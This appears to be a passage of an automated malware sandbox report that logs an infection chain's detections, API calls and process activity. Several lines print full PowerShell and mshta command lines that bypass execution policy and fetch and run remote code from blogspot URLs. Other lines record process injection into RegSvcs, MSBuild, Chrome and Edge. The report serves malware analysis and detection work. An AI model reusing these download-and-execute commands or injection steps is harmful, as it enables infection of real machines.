                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF652A75BD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00007FF652A75BD8
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA0447A CloseHandle,InitializeCriticalSection,CreateSemaphoreW,CreateSemaphoreW,CreateSemaphoreW,CreateThread,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,InitializeCriticalSection,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection,52_2_6BA0447A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_031D1277 mov eax, dword ptr fs:[00000030h]7_2_031D1277
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B787FF mov eax, dword ptr fs:[00000030h]7_2_05B787FF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B78BD0 mov eax, dword ptr fs:[00000030h]7_2_05B78BD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B7B22E mov eax, dword ptr fs:[00000030h]7_2_05B7B22E
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_3_00770283 mov eax, dword ptr fs:[00000030h]19_3_00770283
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exeCode function: 20_3_02770283 mov eax, dword ptr fs:[00000030h]20_3_02770283
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FEBE58 mov eax, dword ptr fs:[00000030h]52_2_00FEBE58
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FEA765 mov eax, dword ptr fs:[00000030h]52_2_00FEA765
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA26064 mov eax, dword ptr fs:[00000030h]52_2_6BA26064
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA3B4BF mov esi, dword ptr fs:[00000030h]52_2_6BA3B4BF
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00E17BBC mov eax, dword ptr fs:[00000030h]52_2_00E17BBC
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F091E9F mov eax, dword ptr fs:[00000030h]52_2_7F091E9F
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F092203 mov eax, dword ptr fs:[00000030h]52_2_7F092203
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FE643F GetProcessHeap,52_2_00FE643F
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF652A75BD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00007FF652A75BD8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF652A63028 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_00007FF652A63028
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FE7878 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,52_2_00FE7878
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FE799A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_00FE799A
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FEA14C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_00FEA14C
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FE7B31 SetUnhandledExceptionFilter,52_2_00FE7B31
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA04720 FreeLibrary,FreeLibrary,FreeLibrary,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection,DeleteCriticalSection,ReleaseSemaphore,WaitForSingleObject,CloseHandle,CloseHandle,DeleteCriticalSection,CloseHandle,CloseHandle,DeleteCriticalSection,52_2_6BA04720
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA0447A CloseHandle,InitializeCriticalSection,CreateSemaphoreW,CreateSemaphoreW,CreateSemaphoreW,CreateThread,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,InitializeCriticalSection,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection,52_2_6BA0447A
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA049B0 SetUnhandledExceptionFilter,LeaveCriticalSection,52_2_6BA049B0
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA04943 EnterCriticalSection,SetUnhandledExceptionFilter,52_2_6BA04943
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA1FB98 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_6BA1FB98
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA199CC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_6BA199CC
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA19602 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,52_2_6BA19602
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Early bird code injection technique detected
                      Source: C:\Windows\System32\svchost.exeProcess created / APC Queued / Resumed: C:\Program Files\Google\Chrome\Application\chrome.exe
                      Source: C:\Windows\System32\svchost.exeProcess created / APC Queued / Resumed: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.208.159.170 2484
                      .NET source code references suspicious native API functions
                      Source: 7.2.RegSvcs.exe.3616834.2.raw.unpack, Flutter.csReference to suspicious API methods: VirtualAlloc(IntPtr.Zero, new IntPtr(65536), MEM_COMMIT, 4u)
                      Source: 7.2.RegSvcs.exe.3616834.2.raw.unpack, Flutter.csReference to suspicious API methods: Marshal.WriteIntPtr(new IntPtr(intPtr.ToInt64() + num), GetProcAddress(moduleHandle, array[i]))
                      Source: 7.2.RegSvcs.exe.3616834.2.raw.unpack, Flutter.csReference to suspicious API methods: VirtualProtect(intPtr, 65536u, 64u, out var _)
                      Allocates memory in foreign processes
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 2049C190000 protect: page read and write
                      Bypasses PowerShell execution policy
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;
                      Injects a PE file into a foreign processes
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Windows\System32\svchost.exeSection loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: execute and read and write
                      Source: C:\Windows\System32\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe protection: execute and read and write
                      Queues an APC in another process (thread injection)
                      Source: C:\Windows\System32\svchost.exeThread APC queued: target process: C:\Program Files\Google\Chrome\Application\chrome.exe
                      Writes to foreign memory regions
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 540000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 548000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: EEC008Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 540000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 548000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CEA008Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 540000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 548000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: EAE008Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 540000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 548000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 376008Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 288008Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 402000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 540000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 548000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 93A008Jump to behavior
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeMemory written: C:\Windows\System32\dllhost.exe base: 2049C190000
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeMemory written: C:\Windows\System32\dllhost.exe base: 7FF7E61714E0
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8F8139 SetForegroundWindow,ShellExecuteExW,AllowSetForegroundWindow,GetLastError,GetLastError,DestroyWindow,SetLastError,52_2_6B8F8139
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\SettingSyncHost.exe "C:\Windows\System32\SettingSyncHost.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 772Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 892Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 792Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmlaunch.exe "C:\Program Files\Windows Media Player\wmlaunch.exe"
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;& ('{1}{0}' -f 'ex', 'i') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);start-sleep -seconds 6;
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe "javascript:var lhn = ['shell.application', 'shellexecute', 'powershell', '-ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;start-sleep -seconds 7;', '', 'open', 0], iax = ['scripting.filesystemobject', 'deletefile', 'wscript.scriptfullname'], ijs = new activexobject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new activexobject(iax[0])[iax[1]](wscript[iax[2]]);"
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe "c:\windows\system32\mshta.exe" "javascript:var fll = ['shell.application', 'shellexecute', 'powershell', '-ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;start-sleep -seconds 7
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe "javascript:var lhn = ['shell.application', 'shellexecute', 'powershell', '-ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;start-sleep -seconds 7;', '', 'open', 0], iax = ['scripting.filesystemobject', 'deletefile', 'wscript.scriptfullname'], ijs = new activexobject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new activexobject(iax[0])[iax[1]](wscript[iax[2]]);"
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe "c:\windows\system32\mshta.exe" "javascript:var fll = ['shell.application', 'shellexecute', 'powershell', '-ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;start-sleep -seconds 7
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe "javascript:var lhn = ['shell.application', 'shellexecute', 'powershell', '-ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;start-sleep -seconds 7;', '', 'open', 0], iax = ['scripting.filesystemobject', 'deletefile', 'wscript.scriptfullname'], ijs = new activexobject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new activexobject(iax[0])[iax[1]](wscript[iax[2]]);"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;& ('{1}{0}' -f 'ex', 'i') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);start-sleep -seconds 6;Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8F66A9 GetSecurityDescriptorDacl,SetSecurityDescriptorDacl,52_2_6B8F66A9
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B900E06 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,52_2_6B900E06
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FE7B9B cpuid 52_2_00FE7B9B
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,52_2_6BA38030
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,52_2_6BA37AE3
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: EnumSystemLocalesW,52_2_6BA37A56
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: EnumSystemLocalesW,52_2_6BA379BB
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: EnumSystemLocalesW,52_2_6BA37970
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: GetLocaleInfoW,52_2_6BA378C7
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: GetLocaleInfoW,52_2_6BA37F63
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,52_2_6BA37E5C
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: GetLocaleInfoW,52_2_6BA37D33
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: EnumSystemLocalesW,52_2_6BA2F1F6
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: GetLocaleInfoW,52_2_6BA2F76D
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: IsValidCodePage,GetLocaleInfoW,52_2_6BA376F8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
